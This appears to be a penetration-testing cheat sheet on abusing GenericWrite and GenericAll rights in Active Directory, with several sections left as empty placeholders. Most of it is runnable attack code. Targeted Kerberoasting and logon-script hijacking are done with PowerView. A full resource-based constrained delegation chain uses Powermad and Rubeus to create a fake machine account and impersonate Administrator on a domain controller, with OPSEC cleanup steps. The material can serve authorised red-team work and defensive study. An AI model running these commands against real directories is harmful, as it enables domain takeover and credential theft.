GenericWrite / GenericAll

References:

GenericAll / GenericWrite / Write on Computer
Kerberos Resource-based Constrained Delegation: Computer Object Takeover
Resource-based Constrained Delegation

download:

git clone https://github.com/SecureAuthCorp/impacket.git
git clone https://github.com/PowerShellMafia/PowerSploit.git
git clone https://github.com/Kevin-Robertson/Powermad.git
git clone https://github.com/GhostPack/Rubeus.git

GenericWrite:

User:

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
## Targeted Kerberoasting: with GenericWrite on the user, add an SPN, request a service ticket for it
## (encrypted with the target user's password hash) and crack it offline (hashcat mode 13100)
Set-DomainObject -Credential $Cred -Identity Target_User -Set @{serviceprincipalname='nonexistent/BLAHBLAH'}
Get-DomainUser Target_User | Select serviceprincipalname
Get-DomainSPNTicket -Credential $Cred Target_User | fl
# OPSEC: remove the added SPN afterwards. -Clear wipes the whole attribute, so if the user already
# had legitimate SPNs, re-set those instead of clearing.
Set-DomainObject -Credential $Cred -Identity Target_User -Clear serviceprincipalname


## Logon script: scriptPath runs the next time the target user logs on interactively. The value is
## resolved relative to the NETLOGON share unless it is a full UNC path.
Set-DomainObject -Identity Target_User -Set @{scriptpath="C:\Windows\Tasks\login.ps1"}

Group:

// Some code

Object:

// Some code

Machine account:

On the compromised device (the user running these commands must hold GenericWrite/GenericAll on the target computer object):

# Import Powermad
Import-Module ./Powermad.ps1

# Set variables: the attacker-controlled machine account to create, and the target computer object
$FakePC = "FAKE01"
$targetComputer = "DC"

# With Powermad, add the new fake computer object to AD (permitted by the default MachineAccountQuota of 10).
New-MachineAccount -MachineAccount $FakePC -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

# With the built-in AD module, write msDS-AllowedToActOnBehalfOfOtherIdentity on the target computer so that
# FAKE01$ is allowed to delegate to it (resource-based constrained delegation). This is the step that needs
# GenericWrite/GenericAll on the target.
Set-ADComputer $targetComputer -PrincipalsAllowedToDelegateToAccount ($FakePC + '$')

# With the built-in AD module, check that the last command worked (FAKE01$ should be listed).
Get-ADComputer $targetComputer -Properties PrincipalsAllowedToDelegateToAccount
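The steps above stop once the delegation attribute is written. The following is an added example, not code from the original page or from the Powermad/PowerView/Rubeus projects, showing the rest of the chain from the compromised host: a PowerView-only way to write the attribute when the RSAT AD module is not installed, a check that decodes the attribute back into SIDs, the S4U2Self/S4U2Proxy request with Rubeus (already in the download list above), and cleanup. It assumes the current user holds GenericWrite/GenericAll on the target computer, MachineAccountQuota is at its default, the tools sit in the working directory, and that the impersonated user is not in Protected Users or flagged "sensitive, cannot be delegated" (RBCD does not work for such accounts). Host name, domain, password and the impersonated account are hypothetical placeholders.

```powershell
# Added example, not from the original page: full RBCD chain from the compromised host.
# Assumes GenericWrite/GenericAll on the target computer object, default MachineAccountQuota,
# and Powermad.ps1, PowerView.ps1 and Rubeus.exe in the working directory.
# FakePC, password, target, domain and impersonated user are hypothetical placeholders.
Import-Module .\Powermad.ps1
Import-Module .\PowerView.ps1

$FakePC         = 'FAKE01'
$FakePCPassword = 'Summer2024!'
$TargetComputer = 'DC'
$Domain         = 'testlab.local'
$TargetFQDN     = "$TargetComputer.$Domain"
$Impersonate    = 'Administrator'   # must not be in Protected Users or marked "sensitive, cannot be delegated"

# 1. Create the attacker-controlled machine account.
New-MachineAccount -MachineAccount $FakePC -Password (ConvertTo-SecureString $FakePCPassword -AsPlainText -Force) -Verbose

# 2. Write msDS-AllowedToActOnBehalfOfOtherIdentity on the target (RBCD).
#    Option A needs the RSAT AD module:
Set-ADComputer $TargetComputer -PrincipalsAllowedToDelegateToAccount "$FakePC`$"

#    Option B does the same with PowerView only: build a raw security descriptor whose DACL
#    grants FAKE01$ full control and write its binary form into the attribute.
$FakeSID = Get-DomainComputer $FakePC -Properties objectsid | Select-Object -ExpandProperty objectsid
$SD      = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$FakeSID)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity' = $SDBytes}

# 3. Verify by decoding the attribute back into SIDs; FAKE01$ should be printed.
$Raw   = Get-DomainComputer $TargetComputer -Properties 'msds-allowedtoactonbehalfofotheridentity' |
         Select-Object -ExpandProperty 'msds-allowedtoactonbehalfofotheridentity'
$Check = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Raw, 0
$Check.DiscretionaryAcl | ForEach-Object { ConvertFrom-SID $_.SecurityIdentifier }

# 4. S4U2Self + S4U2Proxy as FAKE01$: get a CIFS ticket for the target as the impersonated
#    user and inject it into the current logon session. The RC4 key is parsed from the
#    "rc4_hmac : <hash>" line that Rubeus hash prints.
$Rc4 = (.\Rubeus.exe hash "/password:$FakePCPassword" "/user:$FakePC`$" "/domain:$Domain" |
        Select-String 'rc4_hmac').ToString().Split(':')[-1].Trim()
.\Rubeus.exe s4u "/user:$FakePC`$" "/rc4:$Rc4" "/impersonateuser:$Impersonate" "/msdsspn:cifs/$TargetFQDN" /ptt

# 5. Use the ticket, then undo: clear the delegation entry and disable the machine account.
#    The creator of a MachineAccountQuota account can normally disable it but not delete it.
Get-ChildItem "\\$TargetFQDN\c`$"
Set-ADComputer $TargetComputer -PrincipalsAllowedToDelegateToAccount $null
Disable-MachineAccount -MachineAccount $FakePC
```

Option A and Option B write the same value, so only one of them is needed; Option B is there for hosts without RSAT. If MachineAccountQuota has been set to 0, step 1 fails and any existing account with an SPN whose password or hash you already control can be used in place of FAKE01$.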

GenericAll:

User:

// Some code

Group:

// Some code

Object:

// Some code
